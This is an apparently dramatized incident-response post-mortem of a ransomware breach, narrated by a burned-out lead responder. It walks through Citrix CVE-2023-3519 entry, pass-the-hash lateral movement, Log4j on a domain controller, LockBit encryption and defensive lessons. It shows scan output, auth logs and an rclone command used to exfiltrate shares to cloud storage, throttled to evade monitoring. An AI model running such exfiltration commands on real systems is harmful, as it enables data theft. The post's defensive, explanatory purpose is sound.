Timestamp: 04:12 AM. Status: Containment achieved, but the patient is brain-dead. Here is how we let the house burn down because someone thought ‘Password123’ was a viable strategy.
I’m sitting in the data center, and the smell is a mix of ozone, stale Monster Energy, and the literal stench of failure. The CRAC units are screaming at 100% capacity, trying to cool down racks of servers that are doing nothing but churning through encrypted garbage. My eyes feel like someone rubbed them with sandpaper and dipped them in vinegar. Seventy-two hours. That’s how long it’s been since the first alert hit my phone. I haven’t seen the sun, but I’ve seen enough hex dumps to last a lifetime.
You want a report? You want to know why the “state-of-the-art” defense system you spent seven figures on didn’t do a damn thing? It’s because you can’t buy your way out of incompetence. You ignored every cybersecurity best practice we put in the 2022 budget proposal because the ROI wasn’t “visible” enough for the shareholders. Well, look at the ROI now. It’s zero. Actually, it’s negative.
Table of Contents
Initial Access Vector: The Citrix Gateway to Hell
It started on Tuesday. Or maybe it was Monday. The days have blurred into a single, agonizing stream of packet captures. The entry point wasn’t some sophisticated zero-day developed by a nation-state. It was CVE-2023-3519. A remote code execution vulnerability in the Citrix ADC. We told you to patch it three weeks ago. The ticket is still “Pending Approval” in Jira.
The attacker sent a specifically crafted unauthenticated buffer overflow request to the management interface. Because the management interface was—against every piece of advice I’ve ever given—exposed to the public internet.
Here is what the initial reconnaissance looked like on the edge:
# nmap -sV -p 443,80,22,445 --script=http-vuln-cve2023-3519 10.0.4.15
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-12 02:14 UTC
Nmap scan report for gateway.internal (10.0.4.15)
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd
443/tcp open ssl/http Citrix NetScaler ADC httpd
|_http-vuln-cve2023-3519: VULNERABLE
| State: VULNERABLE
| IDs: CVE:CVE-2023-3519
| A remote code execution vulnerability exists in Citrix ADC and Citrix Gateway.
445/tcp open microsoft-ds?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds
They didn’t even have to try. They just knocked, and the door fell off the hinges. Once they had RCE on the Citrix box, they dropped a web shell. A simple, nasty little PHP script hidden in /var/netscaler/gui/vpn/media/logo.php. From there, they had a persistent foothold. They weren’t even using a fancy C2 framework at first. Just raw sockets and a dream.
The kernel on that box? Linux Kernel 5.15.0-76-generic. Outdated. Vulnerable. The OpenSSL version? 3.0.7. We might as well have left the keys in the ignition and the engine running in a bad neighborhood.
Persistence and the Failure of Internal Segmentation
Once they were in, they didn’t rush. These guys are professionals. They spent the first six hours just mapping the environment. They used netstat to see who we talk to. They looked at the ARP cache. They realized, much to their delight, that our internal network is as flat as a pancake. No VLANs that actually block traffic. No micro-segmentation. Just one big, happy family of vulnerable assets.
I watched the logs—after the fact, of course, because the real-time alerting was suppressed by the attackers—and I saw them running basic discovery.
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 842/sshd: /usr/sbin
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 721/systemd-resolve
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 1024/nsppe
tcp6 0 0 :::22 :::* LISTEN 842/sshd: /usr/sbin
tcp6 0 0 :::80 :::* LISTEN 1156/apache2
udp 0 0 127.0.0.53:53 0.0.0.0:* 721/systemd-resolve
They saw the connections to the database servers. They saw the backup repo. They saw the Domain Controller. And because we use a shared local administrator password across the entire server farm—another “efficiency” measure requested by the IT Operations lead—once they dumped the memory on the Citrix box and found the cached credentials, they owned the whole kingdom.
They used a modified version of Mimikatz, renamed to totally_not_malware.exe, to pull hashes. They didn’t even need to crack them. They just used Pass-the-Hash to move laterally. It was like watching a virus spread through a petri dish.
Lateral Movement: The SMB Free-for-All
By hour twelve, they had moved from the DMZ into the core production network. They targeted the file servers first. Why? Because that’s where the “crown jewels” live. All those spreadsheets with “Confidential” in the header that people keep saving to public shares.
They used smbclient and crackmapexec to spray the credentials they’d harvested. I’m looking at the journalctl logs from the primary file server right now. It’s a graveyard of failed and then suddenly successful authentication attempts.
Oct 13 03:14:22 fs-prod-01 sshd[18422]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.4.15 user=admin
Oct 13 03:14:24 fs-prod-01 sshd[18422]: Failed password for admin from 10.0.4.15 port 42134 ssh2
Oct 13 03:14:28 fs-prod-01 sshd[18425]: Accepted password for svc_backup from 10.0.4.15 port 42136 ssh2
Oct 13 03:14:28 fs-prod-01 systemd[1]: Started Session 452 of User svc_backup.
Oct 13 03:14:29 fs-prod-01 sudo[18450]: svc_backup : TTY=pts/0 ; PWD=/home/svc_backup ; USER=root ; COMMAND=/usr/bin/apt-get update
Wait, look at that last line. They used sudo on a backup service account. Why does the backup service account have passwordless sudo rights? I’ll tell you why: because the backup script kept failing two years ago and instead of fixing the permissions, someone just gave it root. That “someone” probably got a bonus for “solving the problem quickly.”
From the file server, they pivoted to the Domain Controller. This is where it gets truly ugly. They exploited CVE-2021-44228—yeah, Log4j, the gift that keeps on giving—on an old monitoring agent that was running on the DC. We thought we’d patched all the Log4j instances. We missed one. One is all it takes.
They didn’t just get Domain Admin. They got the keys to the kingdom’s kingdom. They exported the NTDS.dit file. They had every username and every hash for every employee in this company. Your password, Mr. CEO? It was “Golfing2023!”. Very secure. Took them approximately four seconds to crack.
Data Exfiltration: The Rclone Pipe
By hour thirty-six, they were ready to move the data. They didn’t use FTP. They didn’t use some weird custom protocol. They used Rclone. It’s a legitimate tool for syncing files to cloud storage. They configured it to point to a Mega.nz account.
They throttled the upload to stay just under the threshold of our “intelligent” traffic monitoring system. While your dashboard was showing green lights and “Normal Network Health,” four terabytes of intellectual property, payroll data, and customer PII were flowing out of the building.
I’m looking at the process list from the exfiltration point. It’s sickening.
# ps aux | grep rclone
root 19283 4.2 1.2 128432 45212 ? Sl Oct 14 12:00 /tmp/rclone sync /mnt/data/shares remote:backup --config /tmp/rclone.conf --bwlimit 10M --transfers 4 --checkers 8
They even named the config file rclone.conf and put it in /tmp. They weren’t even trying to hide. They knew no one was looking. The SOC was too busy chasing false positives from the broken email filter to notice a massive, sustained outbound connection to a known file-sharing site.
I tried to kill the process when I finally spotted it, but by then, the damage was done. The “sync” was 98% complete. I felt the blood drain out of my face as I watched the last few megabytes fly out the door. That was the moment I knew we weren’t just dealing with a breach; we were dealing with an extinction-level event for this company’s reputation.
The Encryption Phase: LockBit 3.0
Then came the boom. Hour sixty.
They didn’t just encrypt the servers. They went for the backups first. Our “immutable” backups? Turns out they weren’t so immutable when the attacker has the administrative credentials for the storage array. They wiped the snapshots. They formatted the backup volumes. They didn’t just lock the door; they burned the spare keys and filled the locks with lead.
The ransomware payload was LockBit 3.0. It’s fast. It’s efficient. It uses AES-256 in GCM mode for the file encryption and RSA-4096 to protect the keys. It’s mathematically impossible to decrypt without the private key.
I was logged into the console of the main ERP server when it happened. The screen started flickering. Files were changing extensions to .HLP725QS. I tried to run top to see what was eating the CPU, but the top binary had already been encrypted. I tried ls. Encrypted. I tried to shut the damn thing down, but shutdown was gone too.
I had to pull the physical power cables. I was running through the aisles of the data center, ripping cords out of PDUs like a madman. The sound of hard drives clicking as they lost power was the only thing breaking the silence of the room. But it was too late. The encryption routine is multi-threaded and highly optimized. It can chew through a terabyte of data in minutes.
When I finally got the machines back up in a sandbox environment to see what was left, I found the ransom note. README_FOR_DECRYPT.txt. It was on every single directory. It didn’t ask for much—just $5 million in Monero. A bargain, really, considering they have the last ten years of our tax returns.
Recovery and the Smoking Ruins
So here we are. 04:12 AM.
I’ve spent the last twelve hours trying to find a single clean backup. I found one. It’s from 2019. It’s on a tape that was sitting in a drawer in the IT Manager’s office. It has the old payroll system and a bunch of memes from the Harambe era. It’s useless.
The current state of the infrastructure is “Total Loss.” We are rebuilding from scratch. I’m talking bare-metal installs. I’m talking about manually re-entering firewall rules from memory because the config backups were—you guessed it—on the encrypted file share.
The board keeps asking when the “systems will be back online.” The answer is: they won’t be. Not the ones you knew. We are building a new house on the ashes of the old one. And this time, if you try to tell me that MFA is “too inconvenient for the executives,” I’m going to hand you my badge and walk out the door.
We failed because we prioritized convenience over security. We failed because we treated IT as a cost center instead of the literal backbone of the business. We failed because we thought a “cyber insurance policy” was a substitute for a firewall.
The “Lessons from the Trenches” are simple, but I know you won’t listen:
1. Patching isn’t optional. If a CVE has a CVSS score of 9.8, you don’t wait for a change management meeting. You patch it.
2. Identity is the new perimeter. If you don’t have MFA on every single login—internal, external, service accounts—you don’t have security.
3. Segmentation saves lives. A breach in the DMZ should never, ever lead to a compromise of the Domain Controller.
4. Backups are only backups if they are offline. If the server can see the backup, the ransomware can see the backup.
I’m going to go get a cup of coffee that’s probably 40% grounds and 60% bitterness. Then I’m going to start the 400th server rebuild of the week. Don’t call me. Don’t page me. Unless the building is literally on fire, I don’t want to hear from anyone who doesn’t know the difference between a TCP handshake and a milkshake.
The patient is dead. We’re just performing the autopsy now.
Signed,
The Lead Incident Responder (Who is far too old for this)
Technical Appendix for the Audit (That no one will read):
– Infection Vector: CVE-2023-3519 (Citrix ADC RCE)
– Secondary Exploit: CVE-2021-44228 (Log4j on internal monitoring node)
– OS Versions: Ubuntu 22.04.2 LTS (Kernel 5.15.0-76-generic), Windows Server 2019
– Encryption: LockBit 3.0 (AES-256-GCM / RSA-4096)
– Exfiltration Tool: Rclone v1.62.2
– C2 Infrastructure: Cobalt Strike Beacons (hidden in HTTPS traffic)
– Total Data Loss: ~4.2 TB
– Recovery Time Objective (RTO): Unknown. We are in the “praying for a miracle” phase.
Related Articles
Explore more insights and best practices: